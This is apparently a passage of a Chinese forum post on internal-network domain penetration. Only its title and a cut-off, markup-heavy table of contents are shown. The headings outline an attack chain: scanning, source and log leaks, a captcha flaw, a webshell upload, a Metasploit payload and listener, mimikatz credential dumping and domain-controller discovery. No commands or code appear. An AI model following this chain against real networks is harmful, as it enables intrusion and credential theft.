论坛 › 网络渗透测试::『Network penetration testing』 › 完整的内网域渗透

admin 发表于 2022-3-31 01:48:18

完整的内网域渗透

<p align="center" style="color:black;font-family:Calibri,sans-serif;font-size:11.0pt;line-height:107%;margin-bottom:9.3pt;margin-left:0cm;margin-right:1.3pt;margin-top:0cm;text-align:center;">
        <span style="font-family:宋体;font-size:22.0pt;line-height:107%;">完整的内网域渗透</span><span lang="EN-US"></span>
</p>
<p style="color:black;font-family:Calibri,sans-serif;font-size:11.0pt;line-height:107%;margin-bottom:2.55pt;margin-left:.5pt;margin-right:0cm;margin-top:0cm;text-indent:-.5pt;">
        <span style="font-family:宋体;font-size:10.5pt;line-height:107%;">项目六 完整的内网域渗透</span><span lang="EN-US" style="font-family:Times New Roman,serif;font-size:10.5pt;line-height:107%;">...............................................................................................................</span><span lang="EN-US" style="font-family:Segoe UI,sans-serif;font-size:10.5pt;line-height:107%;">1</span><span lang="EN-US"></span>
</p>
<w:sdt sdtdocpart="t" docparttype="Table of Contents" id="696893570">
<p style="color:black;font-family:Times New Roman,serif;font-size:10.5pt;line-height:107%;margin-bottom:2.55pt;margin-left:1.25pt;margin-right:1.5pt;margin-top:0cm;tab-stops:right dotted 416.75pt;text-indent:-.5pt;">
        <!--><span lang="EN-US"><span style="mso-element:field-begin;"></span><span style="mso-spacerun:yes;"> </span>TOC \o &quot;1-3&quot; \h \z \u <span style="mso-element:field-separator;"></span></span><!--><span lang="EN-US"><a href="https://2k8.org/admin/#_Toc21038"><span style="color:black;font-family:Segoe UI,sans-serif;text-decoration:none;text-underline:none;">1. </span><span lang="EN-US" style="color:black;font-family:宋体;text-decoration:none;text-underline:none;"><span lang="EN-US">环境介绍</span></span><span style="color:black;text-decoration:none;text-underline:none;"><span>............................................................................................................. </span></span><!--><span style="color:black;text-decoration:none;text-underline:none;"><span style="mso-element:field-begin;"></span>PAGEREF _Toc21038 \h<span style="mso-element:field-separator;"></span></span><!--><span style="color:black;font-family:Segoe UI,sans-serif;text-decoration:none;text-underline:none;">3</span><span style="color:black;text-decoration:none;text-underline:none;"></span><!--><span style="color:black;text-decoration:none;text-underline:none;"><span style="mso-element:field-end;"></span></span><!--></a></span><span lang="EN-US" style="font-size:11.0pt;line-height:107%;"><w:sdtpr></w:sdtpr></span>
</p>
<p style="color:black;font-family:Times New Roman,serif;font-size:10.5pt;line-height:107%;margin-bottom:2.55pt;margin-left:21.5pt;margin-right:1.5pt;margin-top:0cm;tab-stops:right dotted 416.75pt;text-indent:-.5pt;">
        <span lang="EN-US"><a href="https://2k8.org/admin/#_Toc21039"><span style="color:black;font-family:Segoe UI,sans-serif;text-decoration:none;text-underline:none;">1</span><span style="color:black;font-family:Arial,sans-serif;text-decoration:none;text-underline:none;">.1. </span><span lang="EN-US" style="color:black;font-family:宋体;text-decoration:none;text-underline:none;"><span lang="EN-US">内网渗透环境</span></span><span style="color:black;text-decoration:none;text-underline:none;"><span>......................................................................................... </span></span><!--><span style="color:black;text-decoration:none;text-underline:none;"><span style="mso-element:field-begin;"></span>PAGEREF _Toc21039 \h<span style="mso-element:field-separator;"></span></span><!--><span style="color:black;font-family:Segoe UI,sans-serif;text-decoration:none;text-underline:none;">3</span><span style="color:black;text-decoration:none;text-underline:none;"></span><!--><span style="color:black;text-decoration:none;text-underline:none;"><span style="mso-element:field-end;"></span></span><!--></a></span>
</p>
<p style="color:black;font-family:Times New Roman,serif;font-size:10.5pt;line-height:107%;margin-bottom:2.55pt;margin-left:1.25pt;margin-right:1.5pt;margin-top:0cm;tab-stops:right dotted 416.75pt;text-indent:-.5pt;">
        <span lang="EN-US"><a href="https://2k8.org/admin/#_Toc21040"><span style="color:black;font-family:Segoe UI,sans-serif;text-decoration:none;text-underline:none;">2. </span><span lang="EN-US" style="color:black;font-family:宋体;text-decoration:none;text-underline:none;"><span lang="EN-US">信息收集</span></span><span style="color:black;text-decoration:none;text-underline:none;"><span>............................................................................................................. </span></span><!--><span style="color:black;text-decoration:none;text-underline:none;"><span style="mso-element:field-begin;"></span>PAGEREF _Toc21040 \h<span style="mso-element:field-separator;"></span></span><!--><span style="color:black;font-family:Segoe UI,sans-serif;text-decoration:none;text-underline:none;">3</span><span style="color:black;text-decoration:none;text-underline:none;"></span><!--><span style="color:black;text-decoration:none;text-underline:none;"><span style="mso-element:field-end;"></span></span><!--></a></span>
</p>
<p style="color:black;font-family:Times New Roman,serif;font-size:10.5pt;line-height:107%;margin-bottom:2.55pt;margin-left:21.5pt;margin-right:1.5pt;margin-top:0cm;tab-stops:right dotted 416.75pt;text-indent:-.5pt;">
        <span lang="EN-US"><a href="https://2k8.org/admin/#_Toc21041"><span style="color:black;font-family:Segoe UI,sans-serif;text-decoration:none;text-underline:none;">2</span><span style="color:black;font-family:Arial,sans-serif;text-decoration:none;text-underline:none;">.1. </span><span style="color:black;font-family:Segoe UI,sans-serif;text-decoration:none;text-underline:none;">masscan </span><span lang="EN-US" style="color:black;font-family:宋体;text-decoration:none;text-underline:none;"><span lang="EN-US">端口探测</span></span><span style="color:black;text-decoration:none;text-underline:none;"><span>................................................................................ </span></span><!--><span style="color:black;text-decoration:none;text-underline:none;"><span style="mso-element:field-begin;"></span>PAGEREF _Toc21041 \h<span style="mso-element:field-separator;"></span></span><!--><span style="color:black;font-family:Segoe UI,sans-serif;text-decoration:none;text-underline:none;">3</span><span style="color:black;text-decoration:none;text-underline:none;"></span><!--><span style="color:black;text-decoration:none;text-underline:none;"><span style="mso-element:field-end;"></span></span><!--></a></span>
</p>
<p style="color:black;font-family:Times New Roman,serif;font-size:10.5pt;line-height:107%;margin-bottom:2.55pt;margin-left:21.5pt;margin-right:1.5pt;margin-top:0cm;tab-stops:right dotted 416.75pt;text-indent:-.5pt;">
        <span lang="EN-US"><a href="https://2k8.org/admin/#_Toc21042"><span style="color:black;font-family:Segoe UI,sans-serif;text-decoration:none;text-underline:none;">2</span><span style="color:black;font-family:Arial,sans-serif;text-decoration:none;text-underline:none;">.2. </span><span style="color:black;font-family:Segoe UI,sans-serif;text-decoration:none;text-underline:none;">nmap </span><span lang="EN-US" style="color:black;font-family:宋体;text-decoration:none;text-underline:none;"><span lang="EN-US">获取系统和端口版本信息</span></span><span style="color:black;text-decoration:none;text-underline:none;"><span>........................................................ </span></span><!--><span style="color:black;text-decoration:none;text-underline:none;"><span style="mso-element:field-begin;"></span>PAGEREF _Toc21042 \h<span style="mso-element:field-separator;"></span></span><!--><span style="color:black;font-family:Segoe UI,sans-serif;text-decoration:none;text-underline:none;">3</span><span style="color:black;text-decoration:none;text-underline:none;"></span><!--><span style="color:black;text-decoration:none;text-underline:none;"><span style="mso-element:field-end;"></span></span><!--></a></span>
</p>
<p style="color:black;font-family:Times New Roman,serif;font-size:10.5pt;line-height:107%;margin-bottom:2.55pt;margin-left:1.25pt;margin-right:1.5pt;margin-top:0cm;tab-stops:right dotted 416.75pt;text-indent:-.5pt;">
        <span lang="EN-US"><a href="https://2k8.org/admin/#_Toc21043"><span style="color:black;font-family:Segoe UI,sans-serif;text-decoration:none;text-underline:none;">3. </span><span lang="EN-US" style="color:black;font-family:宋体;text-decoration:none;text-underline:none;"><span lang="EN-US">对网站进行安全检测</span></span><span style="color:black;text-decoration:none;text-underline:none;"><span>........................................................................................ </span></span><!--><span style="color:black;text-decoration:none;text-underline:none;"><span style="mso-element:field-begin;"></span>PAGEREF _Toc21043 \h<span style="mso-element:field-separator;"></span></span><!--><span style="color:black;font-family:Segoe UI,sans-serif;text-decoration:none;text-underline:none;">4</span><span style="color:black;text-decoration:none;text-underline:none;"></span><!--><span style="color:black;text-decoration:none;text-underline:none;"><span style="mso-element:field-end;"></span></span><!--></a></span>
</p>
<p style="color:black;font-family:Times New Roman,serif;font-size:10.5pt;line-height:107%;margin-bottom:2.55pt;margin-left:21.5pt;margin-right:1.5pt;margin-top:0cm;tab-stops:right dotted 416.75pt;text-indent:-.5pt;">
        <span lang="EN-US"><a href="https://2k8.org/admin/#_Toc21044"><span style="color:black;font-family:Segoe UI,sans-serif;text-decoration:none;text-underline:none;">3</span><span style="color:black;font-family:Arial,sans-serif;text-decoration:none;text-underline:none;">.1. </span><span lang="EN-US" style="color:black;font-family:宋体;text-decoration:none;text-underline:none;"><span lang="EN-US">绑定</span></span><span lang="EN-US" style="color:black;font-family:宋体;text-decoration:none;text-underline:none;"><span lang="EN-US"> </span></span><span style="color:black;font-family:Segoe UI,sans-serif;text-decoration:none;text-underline:none;">hosts</span><span style="color:black;text-decoration:none;text-underline:none;"><span>.............................................................................................. </span></span><!--><span style="color:black;text-decoration:none;text-underline:none;"><span style="mso-element:field-begin;"></span>PAGEREF _Toc21044 \h<span style="mso-element:field-separator;"></span></span><!--><span style="color:black;font-family:Segoe UI,sans-serif;text-decoration:none;text-underline:none;">4</span><span style="color:black;text-decoration:none;text-underline:none;"></span><!--><span style="color:black;text-decoration:none;text-underline:none;"><span style="mso-element:field-end;"></span></span><!--></a></span>
</p>
<p style="color:black;font-family:Times New Roman,serif;font-size:10.5pt;line-height:107%;margin-bottom:2.55pt;margin-left:21.5pt;margin-right:1.5pt;margin-top:0cm;tab-stops:right dotted 416.75pt;text-indent:-.5pt;">
        <span lang="EN-US"><a href="https://2k8.org/admin/#_Toc21045"><span style="color:black;font-family:Segoe UI,sans-serif;text-decoration:none;text-underline:none;">3</span><span style="color:black;font-family:Arial,sans-serif;text-decoration:none;text-underline:none;">.2. </span><span style="color:black;font-family:Segoe UI,sans-serif;text-decoration:none;text-underline:none;">gobuster </span><span lang="EN-US" style="color:black;font-family:宋体;text-decoration:none;text-underline:none;"><span lang="EN-US">目录文<span lang="EN-US">件扫描</span></span></span><span style="color:black;text-decoration:none;text-underline:none;"><span>....................................................................... </span></span><!--><span style="color:black;text-decoration:none;text-underline:none;"><span style="mso-element:field-begin;"></span>PAGEREF _Toc21045 \h<span style="mso-element:field-separator;"></span></span><!--><span style="color:black;font-family:Segoe UI,sans-serif;text-decoration:none;text-underline:none;">5</span><span style="color:black;text-decoration:none;text-underline:none;"></span><!--><span style="color:black;text-decoration:none;text-underline:none;"><span style="mso-element:field-end;"></span></span><!--></a></span>
</p>
<p style="color:black;font-family:Times New Roman,serif;font-size:10.5pt;line-height:107%;margin-bottom:2.55pt;margin-left:21.5pt;margin-right:1.5pt;margin-top:0cm;tab-stops:right dotted 416.75pt;text-indent:-.5pt;">
        <span lang="EN-US"><a href="https://2k8.org/admin/#_Toc21046"><span style="color:black;font-family:Segoe UI,sans-serif;text-decoration:none;text-underline:none;">3</span><span style="color:black;font-family:Arial,sans-serif;text-decoration:none;text-underline:none;">.3. </span><span style="color:black;font-family:Segoe UI,sans-serif;text-decoration:none;text-underline:none;">svn </span><span lang="EN-US" style="color:black;font-family:宋体;text-decoration:none;text-underline:none;"><span lang="EN-US">遍历源代码漏洞</span></span><span style="color:black;text-decoration:none;text-underline:none;"><span>............................................................................. </span></span><!--><span style="color:black;text-decoration:none;text-underline:none;"><span style="mso-element:field-begin;"></span>PAGEREF _Toc21046 \h<span style="mso-element:field-separator;"></span></span><!--><span style="color:black;font-family:Segoe UI,sans-serif;text-decoration:none;text-underline:none;">5</span><span style="color:black;text-decoration:none;text-underline:none;"></span><!--><span style="color:black;text-decoration:none;text-underline:none;"><span style="mso-element:field-end;"></span></span><!--></a></span>
</p>
<p style="color:black;font-family:Times New Roman,serif;font-size:10.5pt;line-height:107%;margin-bottom:2.55pt;margin-left:21.5pt;margin-right:1.5pt;margin-top:0cm;tab-stops:right dotted 416.75pt;text-indent:-.5pt;">
        <span lang="EN-US"><a href="https://2k8.org/admin/#_Toc21047"><span style="color:black;font-family:Segoe UI,sans-serif;text-decoration:none;text-underline:none;">3</span><span style="color:black;font-family:Arial,sans-serif;text-decoration:none;text-underline:none;">.4. </span><span style="color:black;font-family:Segoe UI,sans-serif;text-decoration:none;text-underline:none;">wc.db </span><span lang="EN-US" style="color:black;font-family:宋体;text-decoration:none;text-underline:none;"><span lang="EN-US">文件下载</span></span><span style="color:black;text-decoration:none;text-underline:none;"><span>..................................................................................... </span></span><!--><span style="color:black;text-decoration:none;text-underline:none;"><span style="mso-element:field-begin;"></span>PAGEREF _Toc21047 \h<span style="mso-element:field-separator;"></span></span><!--><span style="color:black;font-family:Segoe UI,sans-serif;text-decoration:none;text-underline:none;">6</span><span style="color:black;text-decoration:none;text-underline:none;"></span><!--><span style="color:black;text-decoration:none;text-underline:none;"><span style="mso-element:field-end;"></span></span><!--></a></span>
</p>
<p style="color:black;font-family:Times New Roman,serif;font-size:10.5pt;line-height:107%;margin-bottom:2.55pt;margin-left:21.5pt;margin-right:1.5pt;margin-top:0cm;tab-stops:right dotted 416.75pt;text-indent:-.5pt;">
        <span lang="EN-US"><a href="https://2k8.org/admin/#_Toc21048"><span style="color:black;font-family:Segoe UI,sans-serif;text-decoration:none;text-underline:none;">3</span><span style="color:black;font-family:Arial,sans-serif;text-decoration:none;text-underline:none;">.5. </span><span style="color:black;font-family:Segoe UI,sans-serif;text-decoration:none;text-underline:none;">thinkphp </span><span lang="EN-US" style="color:black;font-family:宋体;text-decoration:none;text-underline:none;"><span lang="EN-US">日志文件泄露</span></span><span style="color:black;text-decoration:none;text-underline:none;"><span>....................................................................... </span></span><!--><span style="color:black;text-decoration:none;text-underline:none;"><span style="mso-element:field-begin;"></span>PAGEREF _Toc21048 \h<span style="mso-element:field-separator;"></span></span><!--><span style="color:black;font-family:Segoe UI,sans-serif;text-decoration:none;text-underline:none;">6</span><span style="color:black;text-decoration:none;text-underline:none;"></span><!--><span style="color:black;text-decoration:none;text-underline:none;"><span style="mso-element:field-end;"></span></span><!--></a></span>
</p>
<p style="color:black;font-family:Times New Roman,serif;font-size:10.5pt;line-height:107%;margin-bottom:2.55pt;margin-left:21.5pt;margin-right:1.5pt;margin-top:0cm;tab-stops:right dotted 416.75pt;text-indent:-.5pt;">
        <span lang="EN-US"><a href="https://2k8.org/admin/#_Toc21049"><span style="color:black;font-family:Segoe UI,sans-serif;text-decoration:none;text-underline:none;">3</span><span style="color:black;font-family:Arial,sans-serif;text-decoration:none;text-underline:none;">.6. </span><span style="color:black;font-family:Segoe UI,sans-serif;text-decoration:none;text-underline:none;">python </span><span lang="EN-US" style="color:black;font-family:宋体;text-decoration:none;text-underline:none;"><span lang="EN-US">编写日志文件</span></span><span style="color:black;text-decoration:none;text-underline:none;"><span>........................................................................... </span></span><!--><span style="color:black;text-decoration:none;text-underline:none;"><span style="mso-element:field-begin;"></span>PAGEREF _Toc21049 \h<span style="mso-element:field-separator;"></span></span><!--><span style="color:black;font-family:Segoe UI,sans-serif;text-decoration:none;text-underline:none;">6</span><span style="color:black;text-decoration:none;text-underline:none;"></span><!--><span style="color:black;text-decoration:none;text-underline:none;"><span style="mso-element:field-end;"></span></span><!--></a></span>
</p>
<p style="color:black;font-family:Times New Roman,serif;font-size:10.5pt;line-height:107%;margin-bottom:2.55pt;margin-left:21.5pt;margin-right:1.5pt;margin-top:0cm;tab-stops:right dotted 416.75pt;text-indent:-.5pt;">
        <span lang="EN-US"><a href="https://2k8.org/admin/#_Toc21050"><span style="color:black;font-family:Segoe UI,sans-serif;text-decoration:none;text-underline:none;">3</span><span style="color:black;font-family:Arial,sans-serif;text-decoration:none;text-underline:none;">.7. </span><span lang="EN-US" style="color:black;font-family:宋体;text-decoration:none;text-underline:none;"><span lang="EN-US">发现管理密文</span></span><span style="color:black;text-decoration:none;text-underline:none;"><span>......................................................................................... </span></span><!--><span style="color:black;text-decoration:none;text-underline:none;"><span style="mso-element:field-begin;"></span>PAGEREF _Toc21050 \h<span style="mso-element:field-separator;"></span></span><!--><span style="color:black;font-family:Segoe UI,sans-serif;text-decoration:none;text-underline:none;">8</span><span style="color:black;text-decoration:none;text-underline:none;"></span><!--><span style="color:black;text-decoration:none;text-underline:none;"><span style="mso-element:field-end;"></span></span><!--></a></span>
</p>
<p style="color:black;font-family:Times New Roman,serif;font-size:10.5pt;line-height:107%;margin-bottom:2.55pt;margin-left:21.5pt;margin-right:1.5pt;margin-top:0cm;tab-stops:right dotted 416.75pt;text-indent:-.5pt;">
        <span lang="EN-US"><a href="https://2k8.org/admin/#_Toc21051"><span style="color:black;font-family:Segoe UI,sans-serif;text-decoration:none;text-underline:none;">3</span><span style="color:black;font-family:Arial,sans-serif;text-decoration:none;text-underline:none;">.8. </span><span lang="EN-US" style="color:black;font-family:宋体;text-decoration:none;text-underline:none;"><span lang="EN-US">绑定</span></span><span lang="EN-US" style="color:black;font-family:宋体;text-decoration:none;text-underline:none;"><span lang="EN-US"> </span></span><span style="color:black;font-family:Segoe UI,sans-serif;text-decoration:none;text-underline:none;">hosts </span><span lang="EN-US" style="color:black;font-family:宋体;text-decoration:none;text-underline:none;"><span lang="EN-US">碰撞管理后台子域名</span></span><span style="color:black;text-decoration:none;text-underline:none;"><span>...................................................... </span></span><!--><span style="color:black;text-decoration:none;text-underline:none;"><span style="mso-element:field-begin;"></span>PAGEREF _Toc21051 \h<span style="mso-element:field-separator;"></span></span><!--><span style="color:black;font-family:Segoe UI,sans-serif;text-decoration:none;text-underline:none;">9</span><span style="color:black;text-decoration:none;text-underline:none;"></span><!--><span style="color:black;text-decoration:none;text-underline:none;"><span style="mso-element:field-end;"></span></span><!--></a></span>
</p>
<p style="color:black;font-family:Times New Roman,serif;font-size:10.5pt;line-height:107%;margin-bottom:2.55pt;margin-left:21.5pt;margin-right:1.5pt;margin-top:0cm;tab-stops:right dotted 416.75pt;text-indent:-.5pt;">
        <span lang="EN-US"><a href="https://2k8.org/admin/#_Toc21052"><span style="color:black;font-family:Segoe UI,sans-serif;text-decoration:none;text-underline:none;">3</span><span style="color:black;font-family:Arial,sans-serif;text-decoration:none;text-underline:none;">.9. </span><span lang="EN-US" style="color:black;font-family:宋体;text-decoration:none;text-underline:none;"><span lang="EN-US">后台验证码逻辑漏洞</span></span><span style="color:black;text-decoration:none;text-underline:none;"><span>........................................................................... </span></span><!--><span style="color:black;text-decoration:none;text-underline:none;"><span style="mso-element:field-begin;"></span>PAGEREF _Toc21052 \h<span style="mso-element:field-separator;"></span></span><!--><span style="color:black;font-family:Segoe UI,sans-serif;text-decoration:none;text-underline:none;">11</span><span style="color:black;text-decoration:none;text-underline:none;"></span><!--><span style="color:black;text-decoration:none;text-underline:none;"><span style="mso-element:field-end;"></span></span><!--></a></span>
</p>
<p style="color:black;font-family:Times New Roman,serif;font-size:10.5pt;line-height:107%;margin-bottom:2.55pt;margin-left:21.5pt;margin-right:1.5pt;margin-top:0cm;tab-stops:right dotted 416.75pt;text-indent:-.5pt;">
        <span lang="EN-US"><a href="https://2k8.org/admin/#_Toc21053"><span style="color:black;font-family:Segoe UI,sans-serif;text-decoration:none;text-underline:none;">3</span><span style="color:black;font-family:Arial,sans-serif;text-decoration:none;text-underline:none;">.10. </span><span lang="EN-US" style="color:black;font-family:宋体;text-decoration:none;text-underline:none;"><span lang="EN-US">设置上传文件类型拿</span></span><span lang="EN-US" style="color:black;font-family:宋体;text-decoration:none;text-underline:none;"><span lang="EN-US"> </span></span><span style="color:black;font-family:Segoe UI,sans-serif;text-decoration:none;text-underline:none;">webshell</span><span style="color:black;text-decoration:none;text-underline:none;"><span>...................................................... </span></span><!--><span style="color:black;text-decoration:none;text-underline:none;"><span style="mso-element:field-begin;"></span>PAGEREF _Toc21053 \h<span style="mso-element:field-separator;"></span></span><!--><span style="color:black;font-family:Segoe UI,sans-serif;text-decoration:none;text-underline:none;">12</span><span style="color:black;text-decoration:none;text-underline:none;"></span><!--><span style="color:black;text-decoration:none;text-underline:none;"><span style="mso-element:field-end;"></span></span><!--></a></span>
</p>
<p style="color:black;font-family:Times New Roman,serif;font-size:10.5pt;line-height:107%;margin-bottom:2.55pt;margin-left:1.25pt;margin-right:1.5pt;margin-top:0cm;tab-stops:right dotted 416.75pt;text-indent:-.5pt;">
        <span lang="EN-US"><a href="https://2k8.org/admin/#_Toc21054"><span style="color:black;font-family:Segoe UI,sans-serif;text-decoration:none;text-underline:none;">4. metasploit </span><span lang="EN-US" style="color:black;font-family:宋体;text-decoration:none;text-underline:none;"><span lang="EN-US">进行提权和信息收集</span></span><span style="color:black;text-decoration:none;text-underline:none;"><span>................................................................. </span></span><!--><span style="color:black;text-decoration:none;text-underline:none;"><span style="mso-element:field-begin;"></span>PAGEREF _Toc21054 \h<span style="mso-element:field-separator;"></span></span><!--><span style="color:black;font-family:Segoe UI,sans-serif;text-decoration:none;text-underline:none;">13</span><span style="color:black;text-decoration:none;text-underline:none;"></span><!--><span style="color:black;text-decoration:none;text-underline:none;"><span style="mso-element:field-end;"></span></span><!--></a></span>
</p>
<p style="color:black;font-family:Times New Roman,serif;font-size:10.5pt;line-height:107%;margin-bottom:2.55pt;margin-left:21.5pt;margin-right:1.5pt;margin-top:0cm;tab-stops:right dotted 416.75pt;text-indent:-.5pt;">
        <span lang="EN-US"><a href="https://2k8.org/admin/#_Toc21055"><span style="color:black;font-family:Segoe UI,sans-serif;text-decoration:none;text-underline:none;">4</span><span style="color:black;font-family:Arial,sans-serif;text-decoration:none;text-underline:none;">.1. </span><span lang="EN-US" style="color:black;font-family:宋体;text-decoration:none;text-underline:none;"><span lang="EN-US">生成攻击载荷</span></span><span style="color:black;text-decoration:none;text-underline:none;"><span>....................................................................................... </span></span><!--><span style="color:black;text-decoration:none;text-underline:none;"><span style="mso-element:field-begin;"></span>PAGEREF _Toc21055 \h<span style="mso-element:field-separator;"></span></span><!--><span style="color:black;font-family:Segoe UI,sans-serif;text-decoration:none;text-underline:none;">13</span><span style="color:black;text-decoration:none;text-underline:none;"></span><!--><span style="color:black;text-decoration:none;text-underline:none;"><span style="mso-element:field-end;"></span></span><!--></a></span>
</p>
<p style="color:black;font-family:Times New Roman,serif;font-size:10.5pt;line-height:107%;margin-bottom:2.55pt;margin-left:21.5pt;margin-right:1.5pt;margin-top:0cm;tab-stops:right dotted 416.75pt;text-indent:-.5pt;">
        <span lang="EN-US"><a href="https://2k8.org/admin/#_Toc21056"><span style="color:black;font-family:Segoe UI,sans-serif;text-decoration:none;text-underline:none;">4</span><span style="color:black;font-family:Arial,sans-serif;text-decoration:none;text-underline:none;">.2. </span><span lang="EN-US" style="color:black;font-family:宋体;text-decoration:none;text-underline:none;"><span lang="EN-US">监听上线</span></span><span style="color:black;text-decoration:none;text-underline:none;"><span>................................................................................................ </span></span><!--><span style="color:black;text-decoration:none;text-underline:none;"><span style="mso-element:field-begin;"></span>PAGEREF _Toc21056 \h<span style="mso-element:field-separator;"></span></span><!--><span style="color:black;font-family:Segoe UI,sans-serif;text-decoration:none;text-underline:none;">14</span><span style="color:black;text-decoration:none;text-underline:none;"></span><!--><span style="color:black;text-decoration:none;text-underline:none;"><span style="mso-element:field-end;"></span></span><!--></a></span>
</p>
<p style="color:black;font-family:Times New Roman,serif;font-size:10.5pt;line-height:107%;margin-bottom:2.55pt;margin-left:21.5pt;margin-right:1.5pt;margin-top:0cm;tab-stops:right dotted 416.75pt;text-indent:-.5pt;">
        <span lang="EN-US"><a href="https://2k8.org/admin/#_Toc21057"><span style="color:black;font-family:Segoe UI,sans-serif;text-decoration:none;text-underline:none;">4</span><span style="color:black;font-family:Arial,sans-serif;text-decoration:none;text-underline:none;">.3. </span><span style="color:black;font-family:Segoe UI,sans-serif;text-decoration:none;text-underline:none;">migrate </span><span lang="EN-US" style="color:black;font-family:宋体;text-decoration:none;text-underline:none;"><span lang="EN-US">迁移进程</span></span><span style="color:black;text-decoration:none;text-underline:none;"><span>................................................................................ </span></span><!--><span style="color:black;text-decoration:none;text-underline:none;"><span style="mso-element:field-begin;"></span>PAGEREF _Toc21057 \h<span style="mso-element:field-separator;"></span></span><!--><span style="color:black;font-family:Segoe UI,sans-serif;text-decoration:none;text-underline:none;">14</span><span style="color:black;text-decoration:none;text-underline:none;"></span><!--><span style="color:black;text-decoration:none;text-underline:none;"><span style="mso-element:field-end;"></span></span><!--></a></span>
</p>
<p style="color:black;font-family:Times New Roman,serif;font-size:10.5pt;line-height:107%;margin-bottom:2.55pt;margin-left:21.5pt;margin-right:1.5pt;margin-top:0cm;tab-stops:right dotted 416.75pt;text-indent:-.5pt;">
        <span lang="EN-US"><a href="https://2k8.org/admin/#_Toc21058"><span style="color:black;font-family:Segoe UI,sans-serif;text-decoration:none;text-underline:none;">4</span><span style="color:black;font-family:Arial,sans-serif;text-decoration:none;text-underline:none;">.4. </span><span style="color:black;font-family:Segoe UI,sans-serif;text-decoration:none;text-underline:none;">mimikatz </span><span lang="EN-US" style="color:black;font-family:宋体;text-decoration:none;text-underline:none;"><span lang="EN-US">哈希明文获取</span></span><span style="color:black;text-decoration:none;text-underline:none;"><span>..................................................................... </span></span><!--><span style="color:black;text-decoration:none;text-underline:none;"><span style="mso-element:field-begin;"></span>PAGEREF _Toc21058 \h<span style="mso-element:field-separator;"></span></span><!--><span style="color:black;font-family:Segoe UI,sans-serif;text-decoration:none;text-underline:none;">14</span><span style="color:black;text-decoration:none;text-underline:none;"></span><!--><span style="color:black;text-decoration:none;text-underline:none;"><span style="mso-element:field-end;"></span></span><!--></a></span>
</p>
<p style="color:black;font-family:Times New Roman,serif;font-size:10.5pt;line-height:107%;margin-bottom:2.55pt;margin-left:1.25pt;margin-right:1.5pt;margin-top:0cm;tab-stops:right dotted 416.75pt;text-indent:-.5pt;">
        <span lang="EN-US"><a href="https://2k8.org/admin/#_Toc21059"><span style="color:black;font-family:Segoe UI,sans-serif;text-decoration:none;text-underline:none;">5. </span><span lang="EN-US" style="color:black;font-family:宋体;text-decoration:none;text-underline:none;"><span lang="EN-US">跨网段域渗透</span></span><span style="color:black;text-decoration:none;text-underline:none;"><span>................................................................................................... </span></span><!--><span style="color:black;text-decoration:none;text-underline:none;"><span style="mso-element:field-begin;"></span>PAGEREF _Toc21059 \h<span style="mso-element:field-separator;"></span></span><!--><span style="color:black;font-family:Segoe UI,sans-serif;text-decoration:none;text-underline:none;">15</span><span style="color:black;text-decoration:none;text-underline:none;"></span><!--><span style="color:black;text-decoration:none;text-underline:none;"><span style="mso-element:field-end;"></span></span><!--></a></span>
</p>
<p style="color:black;font-family:Times New Roman,serif;font-size:10.5pt;line-height:107%;margin-bottom:2.55pt;margin-left:21.5pt;margin-right:1.5pt;margin-top:0cm;tab-stops:right dotted 416.75pt;text-indent:-.5pt;">
        <span lang="EN-US"><a href="https://2k8.org/admin/#_Toc21060"><span style="color:black;font-family:Segoe UI,sans-serif;text-decoration:none;text-underline:none;">5</span><span style="color:black;font-family:Arial,sans-serif;text-decoration:none;text-underline:none;">.1. </span><span style="color:black;font-family:Segoe UI,sans-serif;text-decoration:none;text-underline:none;">metasploit </span><span lang="EN-US" style="color:black;font-family:宋体;text-decoration:none;text-underline:none;"><span lang="EN-US">跨网段的域渗透</span></span><span style="color:black;text-decoration:none;text-underline:none;"><span>.............................................................. </span></span><!--><span style="color:black;text-decoration:none;text-underline:none;"><span style="mso-element:field-begin;"></span>PAGEREF _Toc21060 \h<span style="mso-element:field-separator;"></span></span><!--><span style="color:black;font-family:Segoe UI,sans-serif;text-decoration:none;text-underline:none;">15</span><span style="color:black;text-decoration:none;text-underline:none;"></span><!--><span style="color:black;text-decoration:none;text-underline:none;"><span style="mso-element:field-end;"></span></span><!--></a></span>
</p>
<p style="color:black;font-family:Times New Roman,serif;font-size:10.5pt;line-height:107%;margin-bottom:2.55pt;margin-left:43.25pt;margin-right:1.5pt;margin-top:0cm;tab-stops:right dotted 416.75pt;text-indent:-.5pt;">
        <span lang="EN-US"><a href="https://2k8.org/admin/#_Toc21061"><span style="color:black;font-family:Segoe UI,sans-serif;text-decoration:none;text-underline:none;">5.1.1. </span><span lang="EN-US" style="color:black;font-family:宋体;text-decoration:none;text-underline:none;"><span lang="EN-US">确定域环境</span></span><span style="color:black;text-decoration:none;text-underline:none;"><span>................................................................................ </span></span><!--><span style="color:black;text-decoration:none;text-underline:none;"><span style="mso-element:field-begin;"></span>PAGEREF _Toc21061 \h<span style="mso-element:field-separator;"></span></span><!--><span style="color:black;font-family:Segoe UI,sans-serif;text-decoration:none;text-underline:none;">15</span><span style="color:black;text-decoration:none;text-underline:none;"></span><!--><span style="color:black;text-decoration:none;text-underline:none;"><span style="mso-element:field-end;"></span></span><!--></a></span>
</p>
<p style="color:black;font-family:Times New Roman,serif;font-size:10.5pt;line-height:107%;margin-bottom:2.55pt;margin-left:43.25pt;margin-right:1.5pt;margin-top:0cm;tab-stops:right dotted 416.75pt;text-indent:-.5pt;">
        <span lang="EN-US"><a href="https://2k8.org/admin/#_Toc21062"><span style="color:black;font-family:Segoe UI,sans-serif;text-decoration:none;text-underline:none;">5.1.2. </span><span lang="EN-US" style="color:black;font-family:宋体;text-decoration:none;text-underline:none;"><span lang="EN-US">定位域控</span></span><span style="color:black;text-decoration:none;text-underline:none;"><span>.................................................................................... </span></span><!--><span style="color:black;text-decoration:none;text-underline:none;"><span style="mso-element:field-begin;"></span>PAGEREF _Toc21062 \h<span style="mso-element:field-separator;"></span></span><!--><span style="color:black;font-family:Segoe UI,sans-serif;text-decoration:none;text-underline:none;">16</span><span style="color:black;text-decoration:none;text-underline:none;"></span><!--><span style="color:black;text-decoration:none;text-underline:none;"><span style="mso-element:field-end;"></span></span><!--></a></span>
</p>
<p style="color:black;font-family:Times New Roman,serif;font-size:10.5pt;line-height:107%;margin-bottom:2.55pt;margin-left:43.25pt;margin-right:1.5pt;margin-top:0cm;tab-stops:right dotted 416.75pt;text-indent:-.5pt;">
